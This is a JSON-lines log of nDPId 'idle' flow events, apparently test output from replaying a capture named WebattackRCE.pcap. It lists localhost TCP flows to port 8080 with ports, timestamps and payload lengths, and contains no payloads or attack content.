-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 